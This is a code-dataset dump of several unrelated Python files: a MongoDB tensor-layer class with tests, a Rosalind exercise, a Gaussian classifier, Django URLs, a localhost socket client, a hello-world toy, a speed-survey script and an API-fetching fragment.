\"A\"+unbuffedString.rjust(11, '0')\r\n\t\treturn ObjectId( buffedString.encode() )\r\n\t\t\r\n\t#Create the Main Attributes Array\r\n\tdef createMainAttrArray(self):\r\n\t\tif 'mainAttrCollection' in self.db.collection_names():\r\n\t\t\tif not self.test:\r\n\t\t\t\treturn True\r\n\t\t\ttry:\r\n\t\t\t\tself.db.mainAttrCollection.drop()\r\n\t\t\texcept NameError:\r\n\t\t\t\tpass\r\n\t\t\t\r\n\t\t#will become the mainCollection when it's properly set up\r\n\t\t#I won't call it that until it's set up to prevent the thing being considered fully created when it isn't\r\n\t\tif 'tempMainAttrCollection' in self.db.collection_names():\r\n\t\t\tself.db.tempMainAttrCollection.drop()\r\n\t\ttempCollection = self.db.create_collection( 'tempMainAttrCollection', write_concern=pymongo.write_concern.WriteConcern(j=True) )#I like journals\r\n\t\t\r\n\t\theadDoc = {\r\n\t\t\t\"_id\": ObjectId(b\"AheadDoc0000\"),\r\n\t\t\t\"Creation DateTime\": str(datetime.datetime.utcnow())\r\n\t\t}\r\n\t\t\r\n\t\ttempCollection.insert_one(headDoc)\r\n\t\t\r\n\t\ttempCollection.rename('mainAttrCollection')\r\n\t\treturn True\r\n\t\t\r\n\tdef deleteMainAttrArray(self):\r\n\t\tif 'mainAttrCollection' not in self.db.collection_names():\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tmc = self.db['mainAttrCollection']\r\n\t\t\tmc.drop()\r\n\t\t\treturn True\r\n\t\treturn False\r\n\t\t\r\n\t#Add a row to the Main Attributes Array in a TensorLayer\r\n\tdef addToMainAttrArray(self, attrArrayIndex):\r\n\t\tif not isinstance(attrArrayIndex, int):\r\n\t\t\treturn False\r\n\t\t\r\n\t\t#Create the new Document - creating a predictable _id field\r\n\t\tdoc = {\r\n\t\t\t\"_id\": self.mainAttrArrayObjectId(attrArrayIndex)\r\n\t\t}\r\n\t\t\t\r\n\t\t#Append the new Document to the 
mainAttrCollection\r\n\t\tself.db.mainAttrCollection.insert_one(doc)\r\n\t\treturn True\r\n\t\t\r\n\t#Remove an element from the Main Collection in a TensorLayer\r\n\tdef removeFromMainAttrArray(self, attrArrayIndex):\r\n\t\tif not isinstance(attrArrayIndex, int):\r\n\t\t\treturn False\r\n\t\t\t\r\n\t\tself.db.mainAttrCollection.delete_one({'_id': self.mainAttrArrayObjectId(attrArrayIndex)})\r\n\t\t\t\r\n\t\treturn True\r\n\t\t\r\n\t#update an attribute at column classifierIndex or by classifierName (which finds classifierIndex)\r\n\t#Also needs what to update (attrArrayIndex)\r\n\t#If it fails part way through, returns an int w/ number of successes in the arrays (in case fails part way through long list)\r\n\tdef updateAttribute(self, attrArrayIndex, classifierIndices=[], classifierNames=[]):\r\n\t\tif (not isinstance(classifierIndices, list)) or (not isinstance(attrArrayIndex, int)) or (not isinstance(classifierNames, list)):\r\n\t\t\traise ValueError\r\n\t\ttoUpdateDict = {}\r\n\t\tfor count, (classifierIndex, classifierName) in enumerate(itertools.zip_longest(classifierIndices, classifierNames)):\r\n\t\t\tif classifierIndex < 0 and classifierName == \"\":\r\n\t\t\t\t#Incorrect input args; push whatever we've got first\r\n\t\t\t\ttry:\r\n\t\t\t\t\tself.db.mainAttrCollection.find_one_and_update(\r\n\t\t\t\t\t{'_id': (self.mainAttrArrayObjectId(attrArrayIndex)) }, {\"$set\": toUpdateDict}\r\n\t\t\t\t\t)\r\n\t\t\t\texcept pymongo.errors.OperationFailure:\r\n\t\t\t\t\tpass\r\n\t\t\t\treturn count - 1\r\n\t\t\telif classifierIndex > -1:\r\n\t\t\t\tclassification = self.runClassifier(attrArrayIndex, classifierIndex)\r\n\t\t\t\tif not isinstance(classification, int):\r\n\t\t\t\t\traise ValueError\r\n\t\t\t\ttoUpdateDict[str(classifierIndex)] = classification\r\n\t\t\telif len(classifierName) > 0:\r\n\t\t\t\tdoc = self.db.mainAttrNotesCollection.find_one({\"Name\": classifierName})\r\n\t\t\t\tif doc is None:\r\n\t\t\t\t\t#Should find a doc no matter what. 
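`mainAttrArrayObjectId` above manufactures a predictable `_id` by left-padding the index to 11 digits and prefixing `"A"`, which is exactly the 12 bytes an `ObjectId` requires; `mainAttrNotesObjectId` later repeats the trick with an `"N"` prefix. A quick check of the construction (note it only works for indices up to 11 digits):

```python
# Deterministic 12-byte ObjectIds from an integer index, as above (sketch).
from bson.objectid import ObjectId

def main_attr_array_object_id(attr_array_index):
    padded = 'A' + str(attr_array_index).rjust(11, '0')  # e.g. 'A00000000042'
    assert len(padded) == 12          # ObjectId accepts exactly 12 bytes
    return ObjectId(padded.encode())

print(main_attr_array_object_id(42))
print(main_attr_array_object_id(42) == main_attr_array_object_id(42))  # True: repeatable
```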
Push whatever we've got first.\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tself.db.mainAttrCollection.find_one_and_update(\r\n\t\t\t\t\t\t{'_id': (self.mainAttrArrayObjectId(attrArrayIndex)) }, {\"$set\": toUpdateDict}\r\n\t\t\t\t\t\t)\r\n\t\t\t\t\texcept pymongo.errors.OperationFailure:\r\n\t\t\t\t\t\tpass\r\n\t\t\t\t\treturn count - 1\r\n\t\t\t\tclassifierIndex = int(str(doc[\"_id\"])[:1])\r\n\t\t\t\tclassification = self.runClassifier(attrArrayIndex, classifierIndex)\r\n\t\t\t\tif not isinstance(classification, int):\r\n\t\t\t\t\traise ValueError\r\n\t\t\t\ttoUpdateDict[str(classifierIndex)] = classification\r\n\t\t\telse:\r\n\t\t\t\t#We're failing ?somehow?; push whatever we've got first\r\n\t\t\t\ttry:\r\n\t\t\t\t\tself.db.mainAttrCollection.find_one_and_update(\r\n\t\t\t\t\t{'_id': (self.mainAttrArrayObjectId(attrArrayIndex)) }, {\"$set\": toUpdateDict}\r\n\t\t\t\t\t)\r\n\t\t\t\texcept pymongo.errors.OperationFailure:\r\n\t\t\t\t\tpass\r\n\t\t\t\treturn count - 1\r\n\t\t\r\n\t\t#update all classifications for this attribute at once\r\n\t\tself.db.mainAttrCollection.find_one_and_update(\r\n\t\t{'_id': (self.mainAttrArrayObjectId(attrArrayIndex))}, {\"$set\": toUpdateDict}\r\n\t\t)\r\n\t\treturn True\r\n\t\t\r\n\tdef mainAttrNotesObjectId(self, attrArrayIndex):\r\n\t\tunbuffedString = str(attrArrayIndex)\r\n\t\tbuffedString = \"N\"+unbuffedString.rjust(11, '0')\r\n\t\treturn ObjectId( buffedString.encode() )\r\n\t\t\r\n\t#Create the Attribute Notes Array\r\n\t#Also sets up the default attribute's notes: intraAssociationList, interAssociationList, domainAttr, selfAttr, interAttr\r\n\t#For more information on why all attributes are assigned domain, self, or inter labels, look @ requirements implementation\r\n\t#If the requirements implementation has been changed, please update these comments. 
Thanks :) - Greg\r\n\tdef createAttrNotesArray(self):\r\n\t\tif 'mainAttrNotesCollection' in self.db.collection_names():\r\n\t\t\tif not self.test:\r\n\t\t\t\treturn True\r\n\t\t\ttry:\r\n\t\t\t\tself.db.mainAttrNotesCollection.drop()\r\n\t\t\texcept NameError:\r\n\t\t\t\tpass\r\n\t\t#will become the mainAttrNotesCollection when it's properly set up\r\n\t\t#I won't call it that until it's set up to prevent the thing being considered fully created when it isn't\r\n\t\tif 'tempMainAttrNotesCollection' in self.db.collection_names():\r\n\t\t\tself.db.tempMainAttrNotesCollection.drop()\r\n\t\ttempCollection = self.db.create_collection( 'tempMainAttrNotesCollection', write_concern=pymongo.write_concern.WriteConcern(j=True) )#I like journals\r\n\t\t\r\n\t\theadDoc = {\r\n\t\t\t"DateTime": str(datetime.datetime.utcnow()),\r\n\t\t\t"_id": ObjectId(b"NheadDoc0000")\r\n\t\t}\r\n\t\t\r\n\t\ttempCollection.insert_one(headDoc)\r\n\t\t\r\n\t\ttempCollection.rename('mainAttrNotesCollection')\r\n\t\treturn True\r\n\t\t\r\n\tdef deleteAttrNotesArray(self):\r\n\t\tif 'mainAttrNotesCollection' not in self.db.collection_names():\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tmc = self.db['mainAttrNotesCollection']\r\n\t\t\tmc.drop()\r\n\t\t\treturn True\r\n\t\treturn False\r\n\t\r\n\t#Add a row to the Attribute Notes Array\r\n\tdef addToAttrNotesArray(self, classifierIndex):\r\n\t\tif not isinstance(classifierIndex, int):\r\n\t\t\treturn False\r\n\t\t\r\n\t\t#Create the new Document - currently nulled\r\n\t\tdoc = {\r\n\t\t\t"_id": (self.mainAttrNotesObjectId(classifierIndex))\r\n\t\t}\r\n\t\t\t\r\n\t\t#Append the new Document to the mainAttrNotesCollection\r\n\t\tself.db.mainAttrNotesCollection.insert_one(doc)\r\n\t\t\r\n\t\treturn True\r\n\t\t\r\n\t#Remove an element from the Attribute Notes Array\r\n\tdef removeFromAttrNotesArray(self, classifierIndex):\r\n\t\tif not isinstance(classifierIndex, int):\r\n\t\t\treturn False\r\n\t\t\t\r\n\t\tself.db.mainAttrNotesCollection.delete_one({'_id': (self.mainAttrNotesObjectId(classifierIndex)) })\r\n\t\t\t\r\n\t\treturn True\r\n\t\t\r\n\t#update an attribute at classifierIndex or by classifierName (which finds classifierIndex)\r\n\t#Must ensure that new updates, which will overwrite, are legitimate.\r\n\t#This adds information to columns of mainAttrArray\r\n\tdef updateAttributeNotes(self, dictOfUpdates, classifierIndex=-1, classifierName=""):\r\n\t\ttry:\r\n\t\t\tid = self.mainAttrNotesObjectId(classifierIndex)\r\n\t\texcept:\r\n\t\t\traise ValueError\r\n\t\tif classifierIndex == -1 and classifierName == "":\r\n\t\t\traise ValueError\r\n\t\telif classifierIndex > -1:\r\n\t\t\tif not isinstance(dictOfUpdates, dict):\r\n\t\t\t\traise ValueError\r\n\t\t\ttry:\r\n\t\t\t\tif not self.db.mainAttrNotesCollection.find_one_and_update(\r\n\t\t\t\t{'_id': id}, {"$set": dictOfUpdates}, upsert=False\r\n\t\t\t\t):\r\n\t\t\t\t\traise KeyError\r\n\t\t\texcept:\r\n\t\t\t\tself.addToAttrNotesArray(classifierIndex)\r\n\t\t\t\tif not self.db.mainAttrNotesCollection.find_one_and_update(\r\n\t\t\t\t{'_id': id}, {"$set": dictOfUpdates}, upsert=True\r\n\t\t\t\t):\r\n\t\t\t\t\traise KeyError\r\n\t\t\treturn True\r\n\t\telif len(classifierName) > 0:\r\n\t\t\tif not isinstance(dictOfUpdates, dict):\r\n\t\t\t\traise ValueError\r\n\t\t\ttry:\r\n\t\t\t\tif not self.db.mainAttrNotesCollection.find_one_and_update(\r\n\t\t\t\t{"Name": classifierName}, {"$set": dictOfUpdates}, upsert=False\r\n\t\t\t\t):\r\n\t\t\t\t\traise KeyError\r\n\t\t\texcept 
KeyError:\r\n\t\t\t\traise\r\n\t\t\texcept:\r\n\t\t\t\traise ValueError\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False\r\n\t\t\t\r\n\t\treturn False\r\n\t\r\n\t#Must create a \"class Derived(TensorLayerModify)\" which will implement the callClassifier function.\r\n\t#Must return an integer. Must be called with a known good index\r\n\t#First retrieve the tensor/list we're trying to classify using attrArrayIndex\r\n\t#Then retrieve the classifier using classifierIndex\r\n\t#Then run the classifier on the tensor/list\r\n\tdef runClassifier(self, attrArrayIndex, classifierIndex):\r\n\t\t#Run a check to see if there even is such a classifier\r\n\t\tnHeadDoc = self.mainAttrNotesCollection.find_one({\"_id\": ObjectId(b\"NheadDoc0000\")})\r\n\t\tif nHeadDoc is None:\r\n\t\t\traise ValueError\r\n\t\tif classifierIndex < 0:\r\n\t\t\traise ValueError\r\n\t\t#Retrieve the tensor/lis we're trying to classify using attrArrayIndex\r\n\t\ttensorDoc = self.mainCollection.find_one( {\"attributes\": attrArrayIndex } )\r\n\t\tif tensorDoc is None:\r\n\t\t\tprint ('attrArrayIndex', attrArrayIndex)\r\n\t\t\tprint('all in mainCollection')\r\n\t\t\tfor doc in self.db.mainCollection.find({}):\r\n\t\t\t\tprint( doc )\r\n\t\t\traise ValueError\r\n\t\t#Retrieve the classifier using classifierIndex\r\n\t\tclassifierFuncDoc = self.mainAttrNotesCollection.find_one( {\"_id\": (self.mainAttrNotesObjectId(classifierIndex)) } )\r\n\t\tif classifierFuncDoc is None:\r\n\t\t\traise ValueError\r\n\t\t#Run the classifier on the tensor/list\r\n\t\treturn self.callClassifier(classifierFuncDoc['Name'], tensorDoc['tensor'])\r\n\t\t\r\n\tdef callClassifier(self, classifierFuncName, attrArray):\r\n\t\t#suggested implementation:\r\n\t\t#callableFunc = dictOfFuncs[classifierFuncName]\r\n\t\t#callableFunc(attrArray, currentStateArgsYourClassifierShouldn'tNeedUSECLASSESUnlessInCThenUDaBOMB)\r\n\t\t#Technically you can call different classifiers on different attributes. Not sure why you'd want to\r\n\t\t#Please manage the dictOfFuncs in the derived class. I don't want that shit here. Thanks! 
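The index branch of `updateAttributeNotes` above first tries a plain `$set` and, on a miss, inserts the row via `addToAttrNotesArray` before retrying with `upsert=True`. In current pymongo the two round-trips can usually be collapsed into a single upserting `update_one`; a hedged sketch (the collection name and id helper mirror the source, a local `mongod` is assumed):

```python
# One-call alternative to the try/insert/retry fallback in
# updateAttributeNotes above (sketch; assumes a local mongod).
import pymongo
from bson.objectid import ObjectId

notes = pymongo.MongoClient('localhost', 27017)['test_database']['mainAttrNotesCollection']

def note_id(classifier_index):
    return ObjectId(('N' + str(classifier_index).rjust(11, '0')).encode())

def update_attribute_notes(classifier_index, updates):
    if not isinstance(updates, dict):
        raise ValueError('updates must be a dict')
    # upsert=True creates the document under this predictable _id when it is
    # missing, so no separate addToAttrNotesArray round-trip is needed.
    result = notes.update_one({'_id': note_id(classifier_index)},
                              {'$set': updates}, upsert=True)
    return result.acknowledged

update_attribute_notes(0, {'Name': 'class0', 'trivial': 1, 'category': 'self'})
```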
:)\r\n\t\t#PassiveAggressiveComments #Hashtag #Octothorpe :P\r\n\t\traise NotImplementedError()\r\n\t\r\n#NOTE TO USER: Must open the server before this testing will work!\r\ndef testTensorLayerModify():\r\n\ttlm = TensorLayerModify(test=True)\r\n\tprint('initialization of TensorLayerModify successful?')\r\n\ttensor = [1, 2, 3, 4, 5]\r\n\t\r\n\t#-----------------------------------------------------------------------------------------------\r\n\t#Check for adding and removing elements to the mainCollection\r\n\t#-----------------------------------------------------------------------------------------------\r\n\tif not tlm.addToTensorLayer(tensor):\r\n\t\traise ValueError\r\n\tprint(\"should find a Doc\", tlm.db.mainCollection.find({\"tensor\": tensor}) )\r\n\tprint(\"the collection:\")\r\n\tfor row in tlm.db.mainCollection.find({}):\r\n\t\tprint(row)\r\n\tif not tlm.removeFromTensorLayer(tensor):\r\n\t\traise ValueError\r\n\tprint(\"should NOT find a Doc\", tlm.db.mainCollection.find({\"tensor\": tensor}) )\r\n\tprint(\"the collection:\")\r\n\tfor row in tlm.db.mainCollection.find({}):\r\n\t\tprint(row)\r\n\t\r\n\tfor _ in range(0, 2):\r\n\t\tif not tlm.addToTensorLayer(tensor):\r\n\t\t\traise ValueError\r\n\t\r\n\tif not tlm.removeFromTensorLayer(tensor):\r\n\t\traise ValueError\r\n\tprint(\"should NOT find a Doc\", tlm.db.mainCollection.find({\"tensor\": tensor}) )\r\n\tprint(\"the collection:\")\r\n\tfor row in tlm.db.mainCollection.find({}):\r\n\t\tprint(row)\r\n\t\r\n\tfor _ in range(2):\r\n\t\tif not tlm.addToTensorLayer(tensor):\r\n\t\t\traise ValueError\r\n\t\t\r\n\tprint( 'should find 3 including headDoc' )\r\n\tfor doc in tlm.db.mainCollection.find({}):\r\n\t\tprint( doc )\r\n\t\r\n\t#Check for the existance of elements in mainAttrCollection\r\n\tprint( 'should find 3 including AheadDoc' )\r\n\tfor doc in tlm.db.mainAttrCollection.find({}):\r\n\t\tprint( doc )\r\n\t\r\n\t#Check for the existance of elements in mainAttrNotesCollection\r\n\tprint( 'should find 1 including NheadDoc because columns/Notes are not inherent to attributeArray/Rows' )\r\n\tfor doc in tlm.db.mainAttrNotesCollection.find({}):\r\n\t\tprint( doc )\r\n\t\r\n\t#-----------------------------------------------------------------------------------------------\r\n\t#this next bit requires implementing runClassifier to test updateAttribute\r\n\t#-----------------------------------------------------------------------------------------------\r\n\tprint('testing runClassifier', flush=True)\r\n\t\r\n\t#This class should open a second connection to the database... 
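`callClassifier` above is deliberately left as a `NotImplementedError` hook, and its comment suggests a dict-of-functions lookup kept in a derived class; the test's `ClassifierMaker` below shows the minimal shape. A slightly fuller registry-based override (the classifier names and bodies here are illustrative, and `TensorLayerModify` is the base class defined above):

```python
# Registry-style override of callClassifier (sketch; classifier functions
# are illustrative, TensorLayerModify is the base class defined above).
class RegistryClassifier(TensorLayerModify):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # the function table lives in the derived class, as the base-class comment asks
        self.dict_of_funcs = {
            'class0': lambda tensor: 0,
            'class1': lambda tensor: int(sum(tensor) > 10),
        }

    def callClassifier(self, classifierFuncName, attrArray):
        try:
            func = self.dict_of_funcs[classifierFuncName]
        except KeyError:
            raise ValueError('no classifier named %r' % classifierFuncName)
        return func(attrArray)  # runClassifier expects an int back

# clf = RegistryClassifier(database='test_database')  # as with ClassifierMaker below
```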
I think\r\n\tclass ClassifierMaker(TensorLayerModify):\r\n\t\t#I think this will override callClassifier in the TensorLayerModify class\r\n\t\tdef callClassifier(self, classifierFuncName, attrArray):\r\n\t\t\tif classifierFuncName == 'class0':\r\n\t\t\t\treturn 0\r\n\t\t\telif classifierFuncName == 'class1':\r\n\t\t\t\treturn 1\r\n\tclassifierMaker = ClassifierMaker(database='test_database')#test=False b/c don't want to zero database\r\n\t\r\n\t#Resuming testing\r\n\ttry:\r\n\t\tif classifierMaker.updateAttribute(0, classifierIndex=-50, classifierName=\"\"):\r\n\t\t\traise ValueError\r\n\texcept ValueError:\r\n\t\traise\r\n\texcept:\r\n\t\tpass\r\n\ttry:\r\n\t\tif classifierMaker.updateAttribute(1):#1 is attrArrayIndex\r\n\t\t\traise ValueError\r\n\texcept ValueError:\r\n\t\traise\r\n\texcept:\r\n\t\tpass\r\n\t\t\r\n\t#-----------------------------------------------------------------------------------------------\r\n\t#Now creating two classifiers by updating attrNotesArray via updateAttributeNotes\r\n\t#-----------------------------------------------------------------------------------------------\r\n\tdictOfUpdates = {'Name': 'class0', 'trivial': 1, 'category': 'self'}#Name; trivial T/F; category: domain, intrarelationship, self;\r\n\tif classifierMaker.updateAttributeNotes(dictOfUpdates, classifierIndex=0):\r\n\t\tprint('classfierNotes @ classifierIndex=0 is set up according to my code')\r\n\tclassifierMaker.updateAttributeNotes({'Name': 'class1'}, classifierIndex=1)\r\n\tdictOfUpdates2 = {'trivial': 1, 'category': 'self'}\r\n\tif classifierMaker.updateAttributeNotes(dictOfUpdates2, classifierName='class1'):\r\n\t\tprint('classfierNotes @ classifierIndex=1 is set up according to my code')\r\n\t\t\r\n\tprint('See Classifier Notes in attrNotesArray collection')\r\n\tfor row in classifierMaker.db.mainAttrNotesCollection.find({}):\r\n\t\tprint(row)\r\n\t\t\r\n\t#what if no such classifier exists and so an exception is raised in the derived class?\r\n\t#Then fail out\r\n\ttry:\r\n\t\tif classifierMaker.updateAttribute(classifierIndex=5):\r\n\t\t\traise ValueError\r\n\texcept ValueError:#nobody should succeed here!\r\n\t\traise\r\n\texcept:\r\n\t\tpass\r\n\t\t\r\n\t#Normal Operation\r\n\ttry:\r\n\t\tif not classifierMaker.updateAttribute(3, classifierIndices=[0]):\r\n\t\t\traise ValueError\r\n\texcept ValueError:#shouldn't fail here!\r\n\t\traise\r\n\texcept:\r\n\t\traise\r\n\tprint('should now be able to see classified information in mainAttrArray')\r\n\tprint('collection:')\r\n\tfor row in tlm.db.mainAttrCollection.find({}):\r\n\t\tprint(row)\r\n\t\r\n\t#Normal Operation\r\n\ttry:\r\n\t\tif not classifierMaker.updateAttribute(4, classifierIndices=[0, 1]):\r\n\t\t\traise ValueError\r\n\texcept ValueError:#shouldn't fail here!\r\n\t\traise\r\n\texcept:\r\n\t\traise\r\n\tprint('should now be able to see classified information in mainAttrArray')\r\n\tprint('collection:')\r\n\tfor row in tlm.db.mainAttrCollection.find({}):\r\n\t\tprint(row)\r\n\t\r\n\t#-----------------------------------------------------------------------------------------------\r\n\t#Check up on the final status!!!\r\n\t#-----------------------------------------------------------------------------------------------\r\n\t#Look at the mainCollection\r\n\tprint( 'headDoc and other members' )\r\n\tfor doc in tlm.db.mainCollection.find({}):\r\n\t\tprint( doc )\r\n\t\r\n\t#Check for the existance of elements in mainAttrCollection\r\n\tprint( 'AheadDoc and other members' )\r\n\tfor doc in 
tlm.db.mainAttrCollection.find({}):\r\n\t\tprint( doc )\r\n\t\r\n\t#Check for the existance of elements in mainAttrNotesCollection\r\n\tprint( 'NheadDoc and other members' )\r\n\tfor doc in tlm.db.mainAttrNotesCollection.find({}):\r\n\t\tprint( doc )\r\n\t\r\n\treturn True\r\n\r\n#NOTE TO USER: Must open the server before this testing will work!\r\nif __name__ == '__main__':\r\n\tprint ('testing TensorLayerModify')\r\n\tif testTensorLayerModify():\r\n\t\tprint ('TensorLayerModify verified')\r\n'''\r\nNotes:\r\nIf this class is ever converted to a compiled language, try to eliminate/check for unbounded memory allocation.\r\n'''","sub_path":"Database Interface/TensorLayerModify.py","file_name":"TensorLayerModify.py","file_ext":"py","file_size_in_byte":20295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"202496984","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 18 15:00:40 2018\n\n@author: 317_lab_B04\n\"\"\"\nimport re\n# open file\n\n# input\n#file = open(\"rosalind_splc.txt\")\nfile = open(\"input.txt\")\n\n# table\nfile_table = open(\"table.txt\")\n\n# declare varies\ntext = file.read()\ntext_table = file_table.read()\n\ndict_RAN_protein_table = {}\n\n# check target file text\nprint(\"target text : \\n\"+text)\nprint(\"table text : \\n\"+text_table)\n\n#split table by ' ' and ',' and put it into dictinary\nfor target in text_table.split():\n target_item = target.split(\",\")\n dict_RAN_protein_table[target_item[0]] = target_item[1]\ndel target, target_item, text_table\n\n#ListDNA = [temp2 for temp2 in text.split(\">\",\"\\n\")]\nListDNA = re.findall(\">\\w*\\s*([\\w\\n]*)\", text)\nListDNA = [temp.replace(\"\\n\", \"\") for temp in ListDNA]\n# write the result in output text file\nopen(\"output.txt\", 'w').close()\nopen(\"output.txt\", 'a').write(\"\")\n\n# close the text file which has already opened since the program ran\nfile.close()","sub_path":"exercise_24_Open_Reading_Frames/exercise_24.py","file_name":"exercise_24.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"479891446","text":"from abc import abstractmethod\n\nfrom Math.DiscreteDistribution import DiscreteDistribution\n\nfrom Classification.Instance.CompositeInstance import CompositeInstance\nfrom Classification.Instance.Instance import Instance\nfrom Classification.Model.ValidatedModel import ValidatedModel\n\n\nclass GaussianModel(ValidatedModel):\n\n priorDistribution: DiscreteDistribution\n\n @abstractmethod\n def calculateMetric(self, instance: Instance, Ci: str) -> float:\n pass\n\n def predict(self, instance: Instance) -> str:\n \"\"\"\n The predict method takes an Instance as an input. First it gets the size of prior distribution and loops this\n size times. Then it gets the possible class labels and and calculates metric value. 
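The Open Reading Frames exercise above extracts FASTA sequences with a single `re.findall` and then strips the embedded newlines; the capture group runs up to the next `>` header because `>` is outside the `[\w\n]` class. A self-contained check on a made-up record:

```python
# FASTA parsing with the regex from the exercise above (sample input is made up).
import re

text = """>Rosalind_01
ATGGTCTAC
ATCGGA
>Rosalind_02
TTGACC
"""

sequences = re.findall(r">\w*\s*([\w\n]*)", text)
sequences = [s.replace("\n", "") for s in sequences]
print(sequences)   # ['ATGGTCTACATCGGA', 'TTGACC']
```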
At the end, it returns the\n class which has the maximum value of metric.\n\n PARAMETERS\n ----------\n instance : Instance\n Instance to predict.\n\n RETURNS\n -------\n str\n The class which has the maximum value of metric.\n \"\"\"\n maxMetric = -10000000\n if isinstance(instance, CompositeInstance):\n predicatedClass = instance.getPossibleClassLabels()[0]\n size = len(instance.getPossibleClassLabels())\n else:\n predicatedClass = self.priorDistribution.getMaxItem()\n size = len(self.priorDistribution)\n for i in range(size):\n if isinstance(instance, CompositeInstance):\n Ci = instance.getPossibleClassLabels()[i]\n else:\n Ci = self.priorDistribution.getItem(i)\n if self.priorDistribution.containsItem(Ci):\n metric = self.calculateMetric(instance, Ci)\n if metric > maxMetric:\n maxMetric = metric\n predicatedClass = Ci\n return predicatedClass","sub_path":"Classification/Model/GaussianModel.py","file_name":"GaussianModel.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"268374059","text":"from django.urls import path\nfrom . import views\napp_name = \"app\"\nurlpatterns = [\n path('create/',views.create, name = 'create'),\n path('data/',views.data, name = 'data'),\n path('recipe_list/',views.recipe_list, name = 'recipe_list'),\n path('/details/',views.details, name = 'details'),\n path('/delete/',views.delete, name = 'delete'),\n]","sub_path":"mysite/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"421682276","text":"#!/usr/bin/env /Users/alrolla/anaconda/bin/python\n\nfrom socket import *\nimport sys\nfrom argparse import ArgumentParser\n\n\ndef main():\n\n parser = ArgumentParser()\n required_named = parser.add_argument_group('required named arguments')\n required_named.add_argument(\"-w\", \"--wordlist\",\n dest=\"words\",\n required=True,\n help=\"Word List{ W1, ..., Wn }\",\n metavar=\"WORD_LIST\")\n\n args = parser.parse_args()\n\n soc = socket(AF_INET, SOCK_STREAM)\n host = \"127.0.0.1\"\n port = 9999\n\n try:\n soc.connect((host, port))\n except:\n print(\"Connection error to DB service ..\")\n sys.exit()\n\n soc.sendall(args.words.strip().encode())\n\n receive = soc.recv(10000).decode()\n\n print(receive)\n soc.close()\n \n # print(\"Enter 'quit' to exit\")\n # message = input(\" -> \")\n #\n # while message != 'quit':\n # # Send the word to the service\n # soc.sendall(message.strip().encode())\n # # Receive the result ( json )\n # receive = soc.recv(10000).decode()\n # print(receive)\n # message = input(\" -> \")\n #\n # soc.send(b'--quit--')\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"web/PHP/Cliente.py","file_name":"Cliente.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"92059941","text":"\"\"\"\nOur first Python test program.\nTeam members: August Wadlington, Bruce Tang, Danny Little\n\"\"\"\nfrom random import randint\n\n\ndef main():\n my_cool_variable = ''\n target = 'Hello world!'\n i = 0\n misfires = 0\n while my_cool_variable != 'Hello world!':\n r = randint(32, 128)\n to_add = chr(r)\n if to_add == target[i]:\n my_cool_variable += to_add\n i += 1\n elif to_add != target[i]:\n misfires += 1\n print(my_cool_variable)\n print(\"Misses: \", misfires)\n if misfires == 0:\n print(\"Are you cheating?\")\n\nif __name__ == 
\"__main__\":\n main()\n","sub_path":"hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"65323680","text":"speed_limit = 50\nmph_list = []\nkph_list = []\nspeeders = 0\nheavy_vehicles = 0\nlight_vehicles = 0\nprivate_cars = 0\ncounter = 0\n\nwhile 1:\n speed = input(\"Next reading: \")\n if speed.upper() == \"END\" and counter == 0:\n print(\"You have not entered any speeds\")\n counter += 1\n elif speed.upper() == \"END\":\n break\n elif speed[0].upper() in (\"H\", \"L\", \"C\") and 0 < int(speed[1:]) < 100:\n speed_value = int(speed[1:])\n kph_value = speed_value * 1.609\n mph_list.append(speed_value)\n kph_list.append(kph_value)\n counter += 1\n if speed[0].upper() == \"H\":\n heavy_vehicles += 1\n elif speed[0].upper() == \"L\":\n light_vehicles += 1\n elif speed[0].upper() == \"C\":\n private_cars += 1\n if speed_value > speed_limit:\n speeders += 1\n else:\n print(\"please enter the correct format\")\n\nprint(\"Total number of vehicles seen:\", counter)\n\nheavy_percent = round((heavy_vehicles / counter) * 100, 2)\nprint(\"Number of heavy goods vehicles seen:\", heavy_vehicles, heavy_percent, \"%\")\n\nlight_percent = round((light_vehicles / counter) * 100, 2)\nprint(\"Number of light good vehicles seen:\", light_vehicles, light_percent, \"%\")\n\nprivate_percent = round((private_cars / counter) * 100, 2)\nprint(\"Number of private cars seen:\", private_cars, private_percent, \"%\")\n\nprint(\"Highest speed seen:\", max(mph_list), \"MPH\", max(kph_list), \"KPH\")\nprint(\"Lowest speed seen:\", min(mph_list), \"MPH\", min(kph_list), \"KPH\")\n\navg_mph = round(sum(mph_list) / len(mph_list), 2)\navg_kph = round(sum(kph_list) / len(kph_list), 2)\nprint(\"Average speed seen:\", avg_mph, \"MPH\", avg_kph, \"KPH\")\n\nspeeders_percent = (speeders/counter)*100\nprint(\"Speed limit violations:\", speeders, round(speeders_percent, 2), \"%\")\n","sub_path":"Assignment/Assessment_oct_v4_test.py","file_name":"Assessment_oct_v4_test.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"113113652","text":"import os, sys, time, json, urllib3, requests, multiprocessing\nurllib3.disable_warnings()\nimport numpy as np\nimport pandas as pd\n\ndef Get(Total):\n API_URL, FILE_DIR, tempLatitude, tempLongitude = Total\n API_RESPONSE = requests.get(url=API_URL, verify=False)\n JSON_RESPONSE = json.loads(API_RESPONSE.text)\n DataFrame = pd.DataFrame.from_dict(JSON_RESPONSE['features'][0]['properties']['parameter'])\n DataFrame.to_csv(FILE_DIR)\n 